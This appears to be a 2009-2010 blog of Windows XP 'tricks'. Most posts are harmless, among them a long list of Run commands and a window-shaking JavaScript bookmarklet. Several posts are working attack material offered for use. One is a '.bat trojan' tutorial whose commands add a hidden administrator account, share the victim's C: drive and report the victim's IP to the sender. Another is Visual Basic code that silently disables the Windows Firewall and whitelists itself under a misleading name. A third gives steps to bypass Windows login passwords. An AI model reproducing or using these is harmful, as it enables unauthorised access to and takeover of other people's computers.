Friday, February 26, 2010
Hide 'User Accounts' from users..(WinXp tricks)
GPEDIT.MSC
Open the path
User Config > Admin Templates > Control Panel
doubleclick "Hide specified Control Panel applets"
put a dot in 'enabled', then click 'Show"
click Add button,
type "nusrmgt.cpl" into the add box and click Ok..
now you can't see the User Accounts in the control panel..!
How to remove Windows hidden softwares?(WinXp tricks)
shortcut..
Start > Run > type "c:\\windows\inf\sysoc.inf" without " " , then delete all worlds "hide" in this file.. (you can find option to find and delete, never change other worlds )
Making your own trojan in a .bat file..(Network hacking tricks..)
-..........................Basics........................-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access
Login to Windows Xp without a password(WinXp Tricks..)
1. Place your Windows XP CD in your cd-rom and start your computer (it’s assumed here that your XP CD is bootable as it should be - and that you have your bios set to boot from CD)
2. Keep your eye on the screen messages for booting to your cd Typically, it will
be “Press any key to boot from cd”
3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.
4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now
5. The Licensing Agreement comes next - Press F8 to accept it.
6. The next screen is the Setup screen which gives you the option to do a Repair. It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”
Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.
7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes. 8. Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically) you will see a progress bar stating “Your computer will reboot in 15 seconds”
9. During the reboot, do not make the mistake of “pressing any key” to boot from
the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.
10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.
11. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.
12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).
13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.
Friday, September 25, 2009
Disable Windows Firewall using Visual Basic (windows security tricks..)
Please note due to display constraints,the code here may not be displayed as in Visual Basic IDE,It will be wrapped up in several lines like the one given below..but you get the idea..
Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""EnableFirewall"" /t REG_DWORD /d ""0"" /f", vbHide
Here is another piece of code that will do it. Instead of disabling it, it allows exceptions to the firewall, and adds a program as an exception.
Public Sub FirewallException(Path As String)
Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""DoNotAllowExceptions"" /t REG_DWORD /d ""0"" /f", vbHide
Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v """ & Path & """ /t REG_SZ /d """ & Path & ":*:Enabled:Windows Messanger"" /f", vbHide
End Sub
Put the above code into a module. To use, put this in your code to add itself to the exception list. You can call this code by using this code -
Call FirewallException(App.Path & "\" & App.EXEName & ".exe")
Funny Computer Trick...(internet browser tricks..)
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)
Run Commands In Windows XP..(windows command)
-
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
-
System Configuration Utility - msconfig
-
System File Checker Utility (Scan Immediately)- sfc /scannow
-
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
-
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
-
System File Checker Utility (Return to Default Setting)- sfc /revert
-
System File Checker Utility (Purge File Cache)- sfc /purgecache
-
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
-
System Properties - sysdm.cpl
-
Task Manager – taskmgr
-
TCP Tester - tcptest
-
Telnet Client - telnet
-
Tweak UI (if installed) - tweakui
-
User Account Management- nusrmgr.cpl
-
Utility Manager - utilman
-
Windows Address Book - wab
-
Windows Address Book Import Utility - wabmig
-
Windows Backup Utility (if installed)- ntbackup
-
Windows Explorer - explorer
-
Windows Firewall- firewall.cpl
-
Windows Magnifier- magnify
-
Windows Management Infrastructure - wmimgmt.msc
-
Windows Media Player - wmplayer
-
Windows Messenger - msmsgs
-
Windows Picture Import Wizard (need camera connected)- wiaacmgr
-
Windows System Security Tool – syskey
-
Windows Update Launches - wupdmgr
-
Windows Version (to show which version of windows)- winver
-
Windows XP Tour Wizard - tourstart
-
Wordpad - write
-
Password Properties - password.cpl
-
Performance Monitor - perfmon.msc
-
Phone and Modem Options - telephon.cpl
-
Phone Dialer - dialer
-
Pinball Game - pinball
-
Power Configuration - powercfg.cpl
-
Printers and Faxes - control printers
-
Printers Folder – printers
-
Private Character Editor - eudcedit
-
Quicktime (If Installed)- QuickTime.cpl
-
Real Player (if installed)- realplay
-
Regional Settings - intl.cpl
-
Registry Editor - regedit
-
Registry Editor - regedit32
-
Remote Access Phonebook - rasphone
-
Remote Desktop - mstsc
-
Removable Storage - ntmsmgr.msc
-
Removable Storage Operator Requests - ntmsoprq.msc
-
Resultant Set of Policy (XP Prof) - rsop.msc
-
Scanners and Cameras - sticpl.cpl
-
Scheduled Tasks - control schedtasks
-
Security Center - wscui.cpl
-
Services - services.msc
-
Shared Folders - fsmgmt.msc
-
Shuts Down Windows - shutdown
-
Sounds and Audio - mmsys.cpl
-
Spider Solitare Card Game - spider
-
Malicious Software Removal Tool - mrt
-
Microsoft Access (if installed) - access.cpl
-
Microsoft Chat - winchat
-
Microsoft Excel (if installed) - excel
-
Microsoft Frontpage (if installed)- frontpg
-
Microsoft Movie Maker - moviemk
-
Microsoft Paint - mspaint
-
Microsoft Powerpoint (if installed)- powerpnt
-
Microsoft Word (if installed)- winword
-
Microsoft Syncronization Tool - mobsync
-
Minesweeper Game - winmine
-
Mouse Properties - control mouse
-
Mouse Properties - main.cpl
-
Nero (if installed)- nero
-
Netmeeting - conf
-
Network Connections - control netconnections
-
Network Connections - ncpa.cpl
-
Network Setup Wizard - netsetup.cpl
-
Notepad - notepad
-
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
-
Object Packager - packager
-
ODBC Data Source Administrator- odbccp32.cpl
-
On Screen Keyboard - osk
-
Opens AC3 Filter (If Installed) - ac3filter.cpl
-
Outlook Express - msimn
-
Paint – pbrush
-
Keyboard Properties - control keyboard
-
IP Configuration (Display Connection Configuration) - ipconfi/all
-
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
-
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
-
IP Configuration (Release All Connections)- ipconfig /release
-
IP Configuration (Renew All Connections)- ipconfig /renew
-
IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
-
IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
-
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
-
Java Control Panel (If Installed)- jpicpl32.cpl
-
Java Control Panel (If Installed)- javaws
-
Local Security Settings - secpol.msc
-
Local Users and Groups - lusrmgr.msc
-
Logs You Out Of Windows - logoff.....
-
Accessibility Controls - access.cpl
-
Accessibility Wizard - accwiz
-
Add Hardware - Wizardhdwwiz.cpl
-
Add/Remove Programs - appwiz.cpl
-
Administrative Tools control - admintools
-
Adobe Acrobat (if installed) - acrobat
-
Adobe Designer (if installed)- acrodist
-
Adobe Distiller (if installed)- acrodist
-
Adobe ImageReady (if installed)- imageready
-
Adobe Photoshop (if installed)- photoshop
-
Automatic Updates - wuaucpl.cpl
-
Bluetooth Transfer Wizard – fsquirt
-
Calculator - calc
-
Certificate Manager - certmgr.msc
-
Character Map - charmap
-
Check Disk Utility - chkdsk
-
Clipboard Viewer - clipbrd
-
Command Prompt - cmd
-
Component Services - dcomcnfg
-
Computer Management - compmgmt.msc
-
Control Panel - control
-
Date and Time Properties - timedate.cpl
-
DDE Shares - ddeshare
-
Device Manager - devmgmt.msc
-
Direct X Control Panel (If Installed)- directx.cpl
-
Direct X Troubleshooter- dxdiag
-
Disk Cleanup Utility- cleanmgr
-
Disk Defragment- dfrg.msc
-
Disk Management- diskmgmt.msc
-
Disk Partition Manager- diskpart
-
Display Properties- control desktop
-
Display Properties- desk.cpl
-
Display Properties (w/Appearance Tab Preselected)- control color
-
Dr. Watson System Troubleshooting Utility- drwtsn32
-
Driver Verifier Utility- verifier
-
Event Viewer- eventvwr.msc
-
Files and Settings Transfer Tool- migwiz
-
File Signature Verification Tool- sigverif
-
Findfast- findfast.cpl
-
Firefox (if installed)- firefox
-
Folders Properties- control folders
-
Fonts- control fonts
-
Fonts Folder- fonts
-
Free Cell Card Game- freecell
-
Game Controllers- joy.cpl
-
Group Policy Editor (XP Prof)- gpedit.msc
-
Hearts Card Game- mshearts
-
Help and Support- helpctr
-
HyperTerminal- hypertrm
-
Iexpress Wizard- iexpress
-
Indexing Service- ciadv.msc
-
Internet Connection Wizard- icwconn1
-
Internet Explorer- iexplore
-
Internet Setup Wizard- inetwiz
-
Internet Properties- inetcpl.cpl